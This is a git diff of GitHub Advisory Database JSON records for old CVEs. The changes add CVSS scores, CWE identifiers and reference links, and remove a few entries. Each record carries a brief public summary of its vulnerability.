b/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json index 4b15a65395aa9..eee2f80c02161 100644 --- a/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json +++ b/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mx9g-mg46-cf6g", - "modified": "2022-04-30T18:18:09Z", + "modified": "2024-02-08T03:32:42Z", "published": "2022-04-30T18:18:09Z", "aliases": [ "CVE-2001-1496" ], "details": "Off-by-one buffer overflow in Basic Authentication in Acme Labs thttpd 1.95 through 2.20 allows remote attackers to cause a denial of service and possibly execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json b/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json index 21e5b82ac8f88..7a67c4fa2fafa 100644 --- a/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json +++ b/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26357" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json b/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json deleted file mode 100644 index d3a93eef0b8a5..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p78x-93mq-qwqh", - "modified": "2022-04-21T01:57:48Z", - "published": "2022-04-21T01:57:48Z", - "aliases": [ - "CVE-2010-3672" - ], - "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 allows XSS in the textarea view helper in an extbase extension.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3672" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3672" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-05T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json b/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json deleted file mode 100644 index 7345169ef527b..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pchp-c5w8-47gc", - "modified": "2022-04-23T00:40:48Z", - "published": "2022-04-23T00:40:48Z", - "aliases": [ - "CVE-2012-0785" - ], - "details": "Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka \"the Hash DoS attack.\"", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0785" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/cve-2012-0785" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2012-01-12/" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2012-0785" - }, - { - "type": "WEB", - "url": "https://www.cloudbees.com/jenkins-security-advisory-2012-01-12" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/01/20/8" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-24T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json b/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json index 86a58ee77acc4..b7158049000dc 100644 --- a/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json +++ b/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q7jv-7633-9g4x", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2068" ], "details": "Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json b/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json index 8750cb1b26d76..74c5a78ed7350 100644 --- a/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json +++ b/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q8p7-6fhh-3h44", - "modified": "2022-04-29T02:58:55Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-29T02:58:55Z", "aliases": [ "CVE-2004-1083" ], "details": "Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with \".ht\" using alternate capitalization.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json b/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json index 0c041cb32d281..519ab933178a5 100644 --- a/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json +++ b/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qcm3-q3pj-vw39", - "modified": "2022-04-29T02:58:20Z", + "modified": "2024-02-02T15:30:26Z", "published": "2022-04-29T02:58:20Z", "aliases": [ "CVE-2004-0772" ], "details": "Double free vulnerabilities in error handling code in krb524d for MIT Kerberos 5 (krb5) 1.2.8 and earlier may allow remote attackers to execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-415" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json b/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json index 9d92dbd4691ed..85d204465a706 100644 --- a/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json +++ b/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26360" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json b/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json index ab952569b9871..81d34cb95e5e1 100644 --- a/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json +++ b/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qhg9-6pfj-f2hv", - "modified": "2022-04-29T03:00:19Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:19Z", "aliases": [ "CVE-2004-1842" ], "details": "Cross-site request forgery (CSRF) vulnerability in Php-Nuke 6.x through 7.1.0 allows remote attackers to gain administrative privileges via an img tag with a URL to admin.php.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json b/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json index 73b71a03d142a..a0a4bd8d8fe06 100644 --- a/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json +++ b/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qr34-449v-3mf6", - "modified": "2022-04-30T18:21:59Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-30T18:21:59Z", "aliases": [ "CVE-2002-1844" ], "details": "Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json b/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json index d558ff8748fb9..de56fb0f85a10 100644 --- a/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json +++ b/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r698-fc6p-rp6g", - "modified": "2022-04-30T18:16:11Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-30T18:16:11Z", "aliases": [ "CVE-2001-0497" ], "details": "dnskeygen in BIND 8.2.4 and earlier, and dnssec-keygen in BIND 9.1.2 and earlier, set insecure permissions for a HMAC-MD5 shared secret key file used for DNS Transactional Signatures (TSIG), which allows attackers to obtain the keys and perform dynamic DNS updates.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json b/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json index a725017a34200..35f9c095c58a0 100644 --- a/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json +++ b/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v25x-3wqw-87r9", - "modified": "2022-04-29T02:59:26Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T02:59:26Z", "aliases": [ "CVE-2004-1363" ], "details": "Buffer overflow in extproc in Oracle 10g allows remote attackers to execute arbitrary code via environment variables in the library name, which are expanded after the length check is performed.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,7 +56,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json b/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json index 30cc5ee415f5a..5ea2e9d5327ab 100644 --- a/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json +++ b/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vcjq-7hcj-xh74", - "modified": "2022-04-30T18:10:12Z", + "modified": "2024-02-02T03:30:26Z", "published": "2022-04-30T18:10:12Z", "aliases": [ "CVE-1999-0239" ], "details": "Netscape FastTrack Web server lists files when a lowercase \"get\" command is used instead of an uppercase GET.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -18,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0239" }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/1731" + }, { "type": "WEB", "url": "http://www.osvdb.org/122" @@ -25,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json b/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json index c5aec1e38373e..921acfeaecbaa 100644 --- a/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json +++ b/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vgr8-rhcx-42jv", - "modified": "2022-04-30T18:10:33Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-30T18:10:33Z", "aliases": [ "CVE-1999-0426" ], "details": "The default permissions of /dev/kmem in Linux versions before 2.0.36 allows IP spoofing.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-276" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json b/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json index 13b706725e6ba..54d5b57630bc8 100644 --- a/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json +++ b/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vv2m-p3gp-w7p3", - "modified": "2022-04-30T18:19:19Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:19:19Z", "aliases": [ "CVE-2002-0485" ], "details": "Norton Anti-Virus (NAV) allows remote attackers to bypass content filtering via attachments whose Content-Type and Content-Disposition headers are mixed upper and lower case, which is ignored by some mail clients.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json b/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json index eff97fac7015f..00a2eb1ab60af 100644 --- a/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json +++ b/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vv6h-2fw3-xm26", - "modified": "2022-04-30T18:18:43Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:18:43Z", "aliases": [ "CVE-2002-0184" ], "details": "Sudo before 1.6.6 contains an off-by-one error that can result in a heap-based buffer overflow that may allow local users to gain root privileges via special characters in the -p (prompt) argument, which are not properly expanded.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -77,6 +80,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-131", "CWE-787" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json b/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json deleted file mode 100644 index e5ab70dac22c9..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wjpc-gjf7-9938", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3663" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains an insecure default value of the variable fileDenyPattern which could allow remote attackers to execute arbitrary code on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3663" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3663" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Arbitrary_Code_Execution" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json b/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json index a7d8cad322c74..e26aa87605d20 100644 --- a/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json +++ b/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26356" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" @@ -48,6 +60,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-667", "CWE-772" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json b/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json index a5571b1af321a..2ce3f208d5e81 100644 --- a/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json +++ b/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wwpq-hgfx-qq8x", - "modified": "2022-04-30T18:15:09Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:15:09Z", "aliases": [ "CVE-2000-1218" ], "details": "The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json b/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json index 6c30dc8d8b1f5..2f29f10a6bbe0 100644 --- a/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json +++ b/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x5gq-fq65-v2wc", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:25Z", "aliases": [ "CVE-2002-2069" ], "details": "PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json b/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json index 1ed5900880bca..877085d2f36e2 100644 --- a/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json +++ b/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xc2p-7wgh-ffh3", - "modified": "2022-04-29T02:57:00Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-29T02:57:00Z", "aliases": [ "CVE-2004-0030" ], "details": "PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-829" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json b/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json index 95be253e16989..d24dc93bd307c 100644 --- a/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json +++ b/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xcmq-73gm-f83r", - "modified": "2022-04-30T18:12:44Z", + "modified": "2024-02-02T03:30:26Z", "published": "2022-04-30T18:12:44Z", "aliases": [ "CVE-1999-1568" ], "details": "Off-by-one error in NcFTPd FTP server before 2.4.1 allows a remote attacker to cause a denial of service (crash) via a long PORT command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json b/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json index 5421d12dfb300..9a050d6d44466 100644 --- a/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json +++ b/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xmv4-4p35-4553", - "modified": "2022-04-30T18:22:07Z", + "modified": "2024-02-08T21:30:29Z", "published": 